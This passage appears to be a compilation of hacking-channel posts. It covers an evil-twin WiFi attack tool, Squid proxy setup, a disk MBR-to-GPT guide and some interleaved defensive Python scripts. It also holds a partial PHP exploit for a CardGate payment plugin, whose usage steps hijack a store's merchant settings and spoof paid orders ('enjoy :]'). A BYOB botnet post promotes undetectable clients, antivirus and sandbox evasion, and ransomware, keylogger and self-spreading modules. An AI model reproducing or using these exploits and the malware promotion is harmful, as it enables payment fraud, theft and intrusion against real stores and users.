β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Automate WiFi attacks 2020:
WireSpy allows attackers to set up quick honeypots to carry out MITM attacks (MITMAs). Monitoring and logging functionality is implemented in order to keep records of the victims' traffic/activities. Other tools can be used together with WireSpy to conduct more advanced attacks.
pinterest.com/UnderCodeOfficial
🦑 Two types of attacks are supported at the moment:
> Evil twin: Force victims to auto-connect to the honeypot by spoofing a "trusted" hotspot (clone an existing access point and de-authenticate its users to force them to transparently connect to the spoofed honeypot).
> Honeypot: Set up a simple rogue hotspot and wait for clients to connect.
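As an added defender-side example (not part of WireSpy or of this post), the following Python script scans a constructed beacon/deauth export for the two signatures of the evil twin described above: an SSID cloned from a second vendor OUI or with encryption dropped, and a burst of deauthentication frames carrying the legitimate AP's own BSSID. The export format, the sample lines and the threshold are assumptions made for the example.

```python
from collections import defaultdict

# Constructed sample of a passive scan export (not real capture data).
# Assumed line format: BSSID|SSID|channel|security|frame_type, where
# frame_type is "beacon" (an AP beacon) or "deauth" (a deauthentication
# frame; the BSSID column is then the transmitter address seen on the air).
SAMPLE_SCAN = """\
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|beacon
00:1a:2b:10:00:02|CoffeeShop|6|WPA2|beacon
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|beacon
f4:f2:6d:aa:bb:cc|CoffeeShop|6|OPEN|beacon
f4:f2:6d:aa:bb:cc|CoffeeShop|6|OPEN|beacon
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
00:1a:2b:10:00:01|CoffeeShop|1|WPA2|deauth
aa:bb:cc:dd:ee:01|Guest|11|WPA2|beacon
aa:bb:cc:dd:ee:02|Guest|36|WPA2|beacon
aa:bb:cc:dd:ee:01|Guest|11|WPA2|deauth
"""


def parse_scan(text):
    """Parse the export into a list of dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split("|")
        if len(parts) != 5:
            continue
        bssid, ssid, channel, security, frame_type = parts
        records.append({
            "bssid": bssid.lower(),
            "ssid": ssid,
            "channel": int(channel),
            "security": security.upper(),
            "frame_type": frame_type.lower(),
        })
    return records


def oui(bssid):
    """Vendor prefix (first three octets) of a MAC address."""
    return bssid[:8]


def find_evil_twins(records):
    """Return {ssid: [reasons]} for SSIDs that look cloned.

    A legitimate multi-AP network (ESS) normally advertises one SSID from
    several BSSIDs sharing a vendor OUI and the same security mode. A copy of
    the SSID from another vendor prefix, or one that drops encryption
    (WPA2 -> OPEN, the classic honeypot clone), is flagged.
    """
    by_ssid = defaultdict(list)
    for r in records:
        if r["frame_type"] == "beacon":
            by_ssid[r["ssid"]].append(r)

    findings = {}
    for ssid, beacons in by_ssid.items():
        bssids = {b["bssid"] for b in beacons}
        if len(bssids) < 2:
            continue
        reasons = []
        if len({b["security"] for b in beacons}) > 1:
            reasons.append("security mismatch between BSSIDs")
        if len({oui(b) for b in bssids}) > 1:
            reasons.append("BSSIDs from different vendor OUIs")
        if reasons:
            findings[ssid] = reasons
    return findings


def deauth_bursts(records, threshold=5):
    """Count deauth frames per transmitter and return those at/above threshold.

    A flood of deauths apparently sent by the legitimate AP's own BSSID is the
    signature of the forced-disconnect step described in the post.
    """
    counts = defaultdict(int)
    for r in records:
        if r["frame_type"] == "deauth":
            counts[r["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_scan(SAMPLE_SCAN)
    for ssid, reasons in find_evil_twins(recs).items():
        print(f"[possible twin] {ssid}: {'; '.join(reasons)}")
    for bssid, n in deauth_bursts(recs).items():
        print(f"[deauth burst] {bssid}: {n} frames")
```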
πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) chmod +x wirespy.sh
Run the script with root privileges:
$ sudo ./wirespy.sh
4) Type help to display the list of available commands.
Available commands
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack
Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Proxy Service: Access Control by URL in Squid:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Access control in Squid based on the URL of the visited site:
> In Squid it is convenient to perform access control based on the URL of the visited site. An example follows.
Suppose you want to prevent users from accessing all sites with "sex" in the URL. You can do this:
1) Define a new ACL via dstdom_regex. In this example we assume that this new ACL is called badurl:
acl badurl dstdom_regex sex
2) Add the corresponding access control entries. Because Squid checks the http_access lines one by one, in order, you must place the http_access deny entries (the prohibited items) before the http_access allow entries, so that Squid actually reaches the deny rule.
3) For example:
http_access deny badurl
http_access allow all
http_access deny ...
and so on.
4) In this way, when the URL of the site a user accesses contains the word "sex", Squid will refuse the access and return a "forbidden" error message.
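As an added example (not from the post or from Squid itself), this Python script models Squid's first-match evaluation of http_access lines so the ordering point in step 2 can be checked directly; the configuration fragments and the client address are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed squid.conf fragments for the example (not from a real deployment).
# The `all` ACL is spelled out here; recent Squid versions define it built in.
DENY_FIRST = """\
acl badurl dstdom_regex sex
acl all src 0.0.0.0/0
http_access deny badurl
http_access allow all
"""

ALLOW_FIRST = """\
acl badurl dstdom_regex sex
acl all src 0.0.0.0/0
http_access allow all
http_access deny badurl
"""


def parse_config(text):
    """Return ({acl name: (type, args)}, [(action, [acl names])]) in file order."""
    acls, rules = {}, []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "acl":
            name, acl_type, args = parts[1], parts[2], parts[3:]
            acls.setdefault(name, (acl_type, []))[1].extend(args)
        elif parts[0] == "http_access":
            rules.append((parts[1], parts[2:]))
    return acls, rules


def acl_matches(acl, url, client_ip):
    """Evaluate the ACL types used in this post (plus dstdomain for contrast)."""
    acl_type, args = acl
    host = (urlsplit(url).hostname or "").lower()
    if acl_type == "dstdom_regex":
        # Regex ACLs are case-sensitive unless the -i flag is given.
        flags, patterns = 0, list(args)
        if patterns and patterns[0] == "-i":
            flags, patterns = re.IGNORECASE, patterns[1:]
        return any(re.search(p, host, flags) for p in patterns)
    if acl_type == "dstdomain":
        return any(host == d.lstrip(".") or (d.startswith(".") and host.endswith(d))
                   for d in args)
    if acl_type == "src":
        ip = ipaddress.ip_address(client_ip)
        return any(ip in ipaddress.ip_network(n, strict=False) for n in args)
    raise ValueError(f"unsupported acl type: {acl_type}")


def http_access(config, url, client_ip="10.0.0.5"):
    """Squid semantics: the first http_access line whose ACLs all match decides.
    If no line matches, the result is the opposite of the last line's action."""
    acls, rules = parse_config(config)
    for action, names in rules:
        line_matches = True
        for name in names:
            negated = name.startswith("!")
            if acl_matches(acls[name.lstrip("!")], url, client_ip) == negated:
                line_matches = False
                break
        if line_matches:
            return action
    if rules:
        return "deny" if rules[-1][0] == "allow" else "allow"
    return "deny"


if __name__ == "__main__":
    for url in ("http://sex.example/", "http://www.middlesex.example/",
                "http://www.example.com/sex"):
        print(f"{url:32} deny-first={http_access(DENY_FIRST, url):5} "
              f"allow-first={http_access(ALLOW_FIRST, url)}")
```

Note that dstdom_regex matches the destination host name only, so with the bare pattern example.com/sex is still allowed while middlesex.example is blocked; use url_regex to match the whole URL and refine the pattern to avoid such collateral blocking.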
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Proxy service: Squid user authentication settings
instagram.com/UmdercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
By default, Squid has no authentication procedure of its own, but user authentication can be achieved through external authentication programs. The common ones are LDAP authentication, SMB authentication, MySQL-based authentication, SOCKS5-based password authentication and RADIUS-based authentication. The following describes the commonly used NCSA authentication. NCSA is one of the authentication programs that comes with the Squid source package. The implementation steps are as follows:
1) Enter the /usr/local/squid/auth_modules/NCSA directory and execute:
make
make install
2) After the compilation succeeds, the ncsa_auth executable is generated; copy it to the /usr/bin directory.
3) Modify the options in the squid.conf file:
acl auth_user proxy_auth REQUIRED
http_access allow auth_user
authenticate_program /usr/local/squid/bin/ncsa_auth /usr/local/squid/etc/passwd
4) Use the htpasswd tool that ships with Apache to generate a password file under /usr/local/squid/etc and add the corresponding user information. Each line of the password file describes one user, namely the username and password. For example, to use htpasswd to generate a password file named passwd and add the user me:
htpasswd -c /usr/local/squid/etc/passwd me
5) Restart Squid and the password authentication will take effect.
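As an added example (not Squid's own ncsa_auth), this Python script implements the same stdin/stdout protocol a Squid basic authentication helper speaks, checking credentials against {SHA} entries of the kind htpasswd -s writes; the user names and passwords in it are constructed for the example.

```python
import base64
import hashlib
import hmac
import sys
from urllib.parse import unquote


def sha_entry(user, password):
    """One line in the form `htpasswd -s` writes: user:{SHA}base64(sha1(pw))."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return f"{user}:{{SHA}}{base64.b64encode(digest).decode('ascii')}"


# Constructed password file (example only); a real one is produced by htpasswd.
SAMPLE_PASSWD = "\n".join([
    "# users for the example proxy",
    sha_entry("me", "s3cret"),
    sha_entry("bob", "hunter2"),
    "",
])


def load_passwd(text):
    """Map user -> stored hash, skipping blank and comment lines."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, stored = line.split(":", 1)
        users[user] = stored
    return users


def verify(stored, password):
    """Constant-time comparison against a {SHA} entry. The other formats the
    real helper accepts (crypt, MD5/apr1, bcrypt) are out of scope here."""
    if not stored.startswith("{SHA}"):
        return False
    expected = base64.b64decode(stored[len("{SHA}"):])
    actual = hashlib.sha1(password.encode("utf-8")).digest()
    return hmac.compare_digest(actual, expected)


def handle_line(line, users):
    """Basic-auth helper protocol: one request per line, "user password"
    (both URL-encoded by Squid); the reply is "OK" or "ERR"."""
    parts = line.rstrip("\r\n").split(" ", 1)
    if len(parts) != 2:
        return "ERR"
    user, password = (unquote(p) for p in parts)
    stored = users.get(user)
    if stored is None:
        return "ERR"  # same answer as a wrong password: do not reveal user existence
    return "OK" if verify(stored, password) else "ERR"


def main():
    # A deployed helper would read the file named on its command line, i.e.
    # the /usr/local/squid/etc/passwd path from the configuration above.
    users = load_passwd(SAMPLE_PASSWD)
    for line in sys.stdin:
        print(handle_line(line, users), flush=True)


if __name__ == "__main__":
    main()
```

Squid 2.5 and later configure the helper with `auth_param basic program /path/to/ncsa_auth /path/to/passwd` rather than the older `authenticate_program` directive shown above. Unsalted {SHA} entries are cracked quickly offline, so prefer htpasswd's salted MD5 (apr1) or bcrypt hashes where the helper supports them.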
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 2020 CVE: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass ⚠️
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
Lack of origin authentication (CWE-346) in the IPN callback processing function allows an (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key, etc.) with values known to him, and therefore bypass the payment process (e.g. spoof an order status by manually sending an IPN callback request with a valid signature but without a real payment) and/or receive all subsequent payments (on behalf of the store).
[code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
*/
/*
Usage:
1) Change values of the constants (see below for TARGET & ORDER*)
2) Host this script somewhere (must be public accessible)
3) Register a merchant at https://cardgate.com
4) Sign into "My CardGate" dashboard
5) Add fake site or choose existing one
6) Click "Setup your Webshop" button in site preferences
7) Paste the URL of this script into the pop-up window and click "Save"
8) The target store now uses the settings of your site, enjoy :]
P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/
// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------
define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sToken_
* @param bool $bTestmode_
* @return string
*/
function pullConfig($sToken_, $bTestmode_ = FALSE) {
    if (!is_string($sToken_)) {
        throw new Exception('invalid token for settings pull: ' . $sToken_);
    }
    $sResource = "pullconfig/{$sToken_}/";
    $sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
    $rCh = curl_init();
    curl_setopt($rCh, CURLOPT_URL, $sUrl);
    curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
    curl_setopt($rCh, CURLOPT_HEADER, FALSE);
    curl_setopt($rCh, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'Accept: application/json'
    ]);
    if ($bTestmode_) {
        curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
    } else {
        curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
        curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
    }
    if (FALSE == ($sResults = curl_exec($rCh))) {
        $sError = curl_error($rCh);
        curl_close($rCh);
🦑 See the full code at the same git link
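As an added example (not CardGate's code and not part of this post), the following Python sketch contrasts the callback pattern behind the CWE-346 weakness described above with an origin-authenticated version that keeps the store's settings immutable from the callback path; the field names, the signing scheme and the store data are assumptions made for the example.

```python
import hashlib
import hmac
import json

# Constructed store state for the example. Field names and the signing scheme
# are assumptions for illustration, not CardGate's actual wire format.
STORE_SETTINGS = {"merchant_id": "1001", "site_id": "7",
                  "secret": "secret-entered-by-the-store-admin"}
LOCAL_ORDERS = {"000000001": {"amount": 49.95, "currency": "EUR", "status": "pending"}}


def fresh_orders():
    """A fresh copy of the local order book so each scenario starts clean."""
    return {k: dict(v) for k, v in LOCAL_ORDERS.items()}


def sign(fields, secret):
    """HMAC-SHA256 over canonical JSON of every field except the signature."""
    body = {k: v for k, v in fields.items() if k != "signature"}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(secret.encode(), canonical, hashlib.sha256).hexdigest()


def signature_ok(request, secret):
    """Constant-time check of the request's signature against the given secret."""
    sig = request.get("signature", "")
    if not isinstance(sig, str) or not sig.isascii():
        return False
    return hmac.compare_digest(sign(request, secret), sig)


def make_ipn(secret, **fields):
    """Build a notification signed with the given secret (genuine or forged)."""
    fields["signature"] = sign(fields, secret)
    return fields


def handle_ipn_vulnerable(request, settings, orders, pull_config=lambda token: {}):
    """The CWE-346 pattern described above: an unauthenticated callback may carry
    a config-pull token, and the settings fetched with it (merchant id, secret)
    overwrite the store's own, so later signature checks trust whoever sent it."""
    if "pullconfig_token" in request:
        settings.update(pull_config(request["pullconfig_token"]))
        return "settings replaced"
    if not signature_ok(request, settings["secret"]):
        return "rejected: bad signature"
    orders[request["order"]]["status"] = request["status"]
    return "order updated"


def handle_ipn_hardened(request, settings, orders):
    """Origin-authenticated handling: settings never change from the callback
    path, the signature is checked with the stored secret, and the notification
    must agree with the locally recorded order."""
    if "pullconfig_token" in request:
        return "rejected: settings change only through the authenticated admin UI"
    if (request.get("merchant_id") != settings["merchant_id"]
            or request.get("site_id") != settings["site_id"]):
        return "rejected: merchant/site mismatch"
    if not signature_ok(request, settings["secret"]):
        return "rejected: bad signature"
    order = orders.get(request.get("order"))
    if order is None:
        return "rejected: unknown order"
    if (order["amount"] != request.get("amount")
            or order["currency"] != request.get("currency")):
        return "rejected: amount/currency mismatch"
    order["status"] = request["status"]
    return "order updated"


if __name__ == "__main__":
    common = dict(merchant_id="1001", site_id="7", order="000000001",
                  amount=49.95, currency="EUR", status="paid")
    genuine = make_ipn(STORE_SETTINGS["secret"], **common)
    forged = make_ipn("attacker-chosen-secret", **common)
    print("genuine:", handle_ipn_hardened(genuine, STORE_SETTINGS, fresh_orders()))
    print("forged: ", handle_ipn_hardened(forged, STORE_SETTINGS, fresh_orders()))
```

Where the provider offers it, confirming the transaction status through a server-to-server lookup with the stored credentials removes the callback's own content from the trust decision entirely.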
> tested by Underc0de
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 How To Build Your Own Botnet 2020 (updated)
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules
t.me/UndercOdeTesting
🦑 FEATURES:
1) Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules
2) Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
Nothing Written To The Disk: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process
3) Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host
4) Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running
5) Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process
6) Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size
7) Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed
8) Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)
9) Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning
10) Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it
11) Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected ⚠️
πβπππΈπππππΈπππβ & βπβ :
1) Clone it on your Windows or Linux machine:
> https://github.com/malwaredllc/byob
2) Go to the byob folder
3) Check the modules; each one is built for a specific purpose. Examples:
> Keylogger (byob.modules.keylogger): logs the user's keystrokes & the window name entered
> Screenshot (byob.modules.screenshot): take a screenshot of the current user's desktop
> Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
> Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment
> Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client
> Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
> Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods
> Phone (byob.modules.phone): read/search/upload text messages from the client smartphone
> Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
> Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
> Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host
> iCloud (byob.modules.icloud): check for logged in iCloud account on macOS
> Spreader (byob.modules.spreader): spread client to other hosts via emails disguised as a plugin update
> Miner (byob.modules.miner): run a cryptocurrency miner in the background (supports Bitcoin & Litecoin)
> For more, feel free to ask
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Use for learning only; it is illegal to use a botnet for stealing or exploitation.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 How can I change the Master Boot Record (MBR) to GPT in Kali Linux (fully tested)
instagram.com/UndercOdeTestingCompany
🦑 Steps (powered by the wiki, tested by UndercOde on Ubuntu):
1) Terminology
2) Converting
3) Configuring (+ dual boot)
🦑 Terminology
BIOS = Basic Input/Output System
(U)EFI = (Unified) Extensible Firmware Interface
MBR = Master Boot Record
GPT = GUID Partition Table
UEFI / EFI / BIOS = Firmware interface
MBR / GPT = How the computer knows (per hard disk) what partitions are on the drive and how to boot from them.
1) UEFI / BIOS
A firmware interface is the way that the firmware (the software inside devices) and operating system interact. It initialises the hardware then runs the operating system and ensures that the operating system drivers can operate the hardware.
2) The BIOS has been the usual firmware interface that has been used. The UEFI is a newer interface that has several features, such as being faster, having a GUI and being able to start the network card and get an ip address. UEFI replaces EFI. (Those developing EFI saw that there were others doing something similar and so joined them, bringing the ideas of EFI with them. This then became UEFI).
3) A BIOS requires the bootloader to be at the start of the disk, however a UEFI uses a partition for this and can choose among multiple boot loaders to use.
MBR / GPT + GRUB
4) The MBR is a section of code at the start of the disk that contains a boot loader (for the BIOS), as well as the partition map and a unique disk identifier.
5) To install GRUB onto a disk with a MBR, GRUB places a small program in the MBR to load the rest of GRUB from another part of the disk. (This is done because the MBR is too small to contain all of GRUB). The space that is chosen is space between the MBR and the first partition, which usually exists.
6) GPT is a standard for how the partitions are specified. It does have a 'protective' MBR, however this is only for allowing BIOS-based computers to boot and for stopping tools that only know about MBR from trying to trash the GPT. It can have
(How GPT is handled depends on whether it is booting using a BIOS (or a UEFI system in BIOS emulation mode) or UEFI. I will focus on UEFI as it relates to the question.)
Boot loaders for operating systems are stored in a partition called the EFI System Partition, which is (usually) formatted with FAT32. This is where GRUB is installed.
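As an added example (not from the wiki or from this post), this Python script builds a protective MBR and a GPT header in memory, using the disk geometry and disk GUID from the gdisk output shown later in this post, then parses and CRC-checks them the way a GPT-aware tool does; the in-memory image is constructed, and the first two sectors of a real device can be fed through the same functions.

```python
import struct
import uuid
import zlib

SECTOR = 512
GPT_SIGNATURE = b"EFI PART"
MBR_ENTRY = "<B3sB3sII"             # status, CHS start, type, CHS end, start LBA, sectors
GPT_HEADER = "<8sIIIIQQQQ16sQIII"   # 92 bytes; field order in build_gpt_header


def build_mbr(total_sectors, ptype=0xEE):
    """Constructed sample MBR with one entry. Type 0xEE spanning the disk is the
    'protective' MBR gdisk writes beside a GPT; 0x83 gives an MBR-only sample."""
    mbr = bytearray(SECTOR)
    size = min(total_sectors - 1, 0xFFFFFFFF)
    mbr[446:462] = struct.pack(MBR_ENTRY, 0x00, b"\x00\x02\x00", ptype,
                               b"\xff\xff\xff", 1, size)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


def build_gpt_header(total_sectors, disk_guid):
    """Constructed sample GPT header for LBA 1 (partition-array CRC left at 0
    because no entry array is built in this example)."""
    fields = (GPT_SIGNATURE, 0x00010000, 92, 0, 0,           # sig, revision, size, CRC, reserved
              1, total_sectors - 1, 34, total_sectors - 34,  # current, backup, first/last usable
              disk_guid.bytes_le, 2, 128, 128, 0)            # GUID, entries LBA, count, size, CRC
    hdr = bytearray(struct.pack(GPT_HEADER, *fields))
    struct.pack_into("<I", hdr, 16, zlib.crc32(bytes(hdr)) & 0xFFFFFFFF)
    return bytes(hdr).ljust(SECTOR, b"\x00")


def parse_mbr(sector0):
    """Return the non-empty partition entries of sector 0 ([] without boot signature)."""
    if len(sector0) < SECTOR or sector0[510:512] != b"\x55\xaa":
        return []
    parts = []
    for i in range(4):
        off = 446 + 16 * i
        _st, _chs0, ptype, _chs1, lba, count = struct.unpack(MBR_ENTRY, sector0[off:off + 16])
        if ptype:
            parts.append({"type": ptype, "start_lba": lba, "sectors": count})
    return parts


def parse_gpt_header(sector1):
    """Decode the header at LBA 1 and recompute its CRC32 (taken with the CRC
    field zeroed), which is how a corrupted or half-written header is noticed."""
    (sig, rev, hsize, crc, _res, cur, backup, first, last,
     guid, entries_lba, count, esize, ecrc) = struct.unpack(GPT_HEADER, sector1[:92])
    if sig != GPT_SIGNATURE:
        raise ValueError("no GPT signature at LBA 1")
    if not 92 <= hsize <= len(sector1):
        raise ValueError(f"implausible header size {hsize}")
    zeroed = bytearray(sector1[:hsize])
    struct.pack_into("<I", zeroed, 16, 0)
    return {
        "revision": rev, "header_crc_ok": (zlib.crc32(bytes(zeroed)) & 0xFFFFFFFF) == crc,
        "current_lba": cur, "backup_lba": backup, "first_usable": first, "last_usable": last,
        "disk_guid": str(uuid.UUID(bytes_le=guid)), "entries_lba": entries_lba,
        "entry_count": count, "entry_size": esize, "entries_crc": ecrc,
    }


def classify_disk(image):
    """Mirror gdisk's 'Partition table scan' for the first two sectors of an image."""
    parts = parse_mbr(image[:SECTOR])
    if len(image) >= 2 * SECTOR and image[SECTOR:SECTOR + 8] == GPT_SIGNATURE:
        hdr = parse_gpt_header(image[SECTOR:2 * SECTOR])
        protective = len(parts) == 1 and parts[0]["type"] == 0xEE
        return {"table": "gpt", "protective_mbr": protective,
                "header_crc_ok": hdr["header_crc_ok"], "disk_guid": hdr["disk_guid"]}
    return {"table": "mbr" if parts else "none", "partitions": parts}


# Geometry and disk GUID taken from the gdisk output shown later in this post.
TOTAL_SECTORS = 7831552
DISK_GUID = uuid.UUID("669247F2-37F7-4797-98F9-9CE56F7EA8C8")
SAMPLE_IMAGE = build_mbr(TOTAL_SECTORS) + build_gpt_header(TOTAL_SECTORS, DISK_GUID)

if __name__ == "__main__":
    # For a real device (as root): open("/dev/sdx", "rb").read(2 * SECTOR)
    print(classify_disk(SAMPLE_IMAGE))
    print(parse_gpt_header(SAMPLE_IMAGE[SECTOR:2 * SECTOR]))
```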
🦑 Converting
First...
1) We are playing around with the partition table, so guaranteed safety is not possible. It is a risky operation. However, the method should not lose data.
Others coming across this: Do not use on Apple Macs.
Now...
2) You will need to do this on a live CD (or another linux installation installed to a different disk.)
3) When dealing with GPT disks, we need to use a GPT-aware program. 'GPT fdisk' is a good tool to use and what I will be using. It can be called gptfdisk or gdisk depending on the distribution (Ubuntu calls it gdisk). Parted (and GParted) is also GPT-aware, so can 'safely' be used with GPT disks.
🦑 To convert you need to:
1 Resize partitions to fit GPT data and EFI system partition.
2 Convert the disk and add partitions
3 Install GRUB to EFI system partition.
1) Resize partitions
Use parted (command line) or gparted (GUI) to resize the first and last partition. The first partition should have about 200MiB free before it, and the last partition should have 1MiB to 2MiB (either will do) taken off the end.
2) Convert the disk
Run
gdisk /dev/sdx
where /dev/sdx is the device you want to convert.
It should tell you that it will convert the partition table:
GPT fdisk (gdisk) version 0.6.14
Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present
*******************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format.
THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by typing 'q' if
you don't want to convert your MBR partitions to GPT format!
*******************************************************
Command (? for help):
Now add a new partition, making it of type 'EFI system'. It should find the free space at the beginning (I suggest some low sector number like 34) and automatically use all the free space.
The examples use a 4GB USB flash drive with 1 partition already on there, resized as per above.
Command (? for help): n
Partition number (2-128, default 2): 2
First sector (34-7831518, default = 34) or {+-}size{KMGTP}:
Information: Moved requested sector from 34 to 2048 in
order to align on 2048-sector boundaries.
Use 'l' on the experts' menu to adjust alignment
Last sector (2048-421887, default = 421887) or {+-}size{KMGTP}:
Current type is 'Linux/Windows data'
Hex code or GUID (L to show codes, Enter = 0700): L
0700 Linux/Windows data 0c01 Microsoft reserved 2700 Windows RE
...
You should now have the EFI partition. Print the table to check:
Command (? for help): p
Disk /dev/sdd: 7831552 sectors, 3.7 GiB
Logical sector size: 512 bytes
Disk identifier (GUID): 669247F2-37F7-4797-98F9-9CE56F7EA8C8
Partition table holds up to 128 entries
First usable sector is 34, last usable sector is 7831518
Partitions will be aligned on 2048-sector boundaries
Total free space is 4029 sectors (2.0 MiB)
Number Start (sector) End (sector) Size Code Name
1 421888 7829503 3.5 GiB 0700 Linux/Windows data
2 2048 421887 205.0 MiB EF00 EFI System
Then write the new table and exit gdisk (w writes and exits):
Command (? for help): w
Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!
Do you want to proceed, possibly destroying your data? (Y/N): y
OK; writing new GUID partition table (GPT).
The operation has completed successfully.
Now use GParted (or, on the command line, mkfs.vfat -F 32 /dev/partition) to format the new partition as FAT32.
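The table that gdisk prints comes from the GPT it has just written, so before rebooting it is worth checking the on-disk structures independently: the "EFI PART" signature, the header CRC32, the partition-array CRC32, and that an entry with the EFI System Partition type GUID (gdisk code EF00) exists. The following is an added example, not part of the original post and not gdisk's code: it parses the primary GPT (LBA 1 and the entry array at LBA 2) from raw bytes and, for the demonstration, builds a constructed image that uses the same sector numbers as the gdisk output above. The GUIDs for "EFI System" and "Linux/Windows data" (Microsoft basic data) are the standard ones; everything else (function names, the sample image) is my own.

```python
# Added example (not from the original post or from gdisk): read the primary
# GPT from a raw disk image, verify both CRC32 checksums, and locate the EFI
# System Partition by its type GUID. build_sample_image() constructs an image
# with the geometry of the 4 GB stick in the gdisk session above; it is not
# captured from a real disk.
import struct
import uuid
import zlib

SECTOR = 512
HDR_FMT = "<8sIIIIQQQQ16sQIII"       # 92-byte GPT header, little-endian
ENTRY_FMT = "<16s16sQQQ72s"          # 128-byte partition entry
ESP_TYPE = uuid.UUID("C12A7328-F81B-11D2-BA4B-00A0C93EC93B")         # EF00
BASIC_DATA_TYPE = uuid.UUID("EBD0A0A2-B9E5-4433-87C0-68B6B72699C7")  # 0700


def crc32(data: bytes) -> int:
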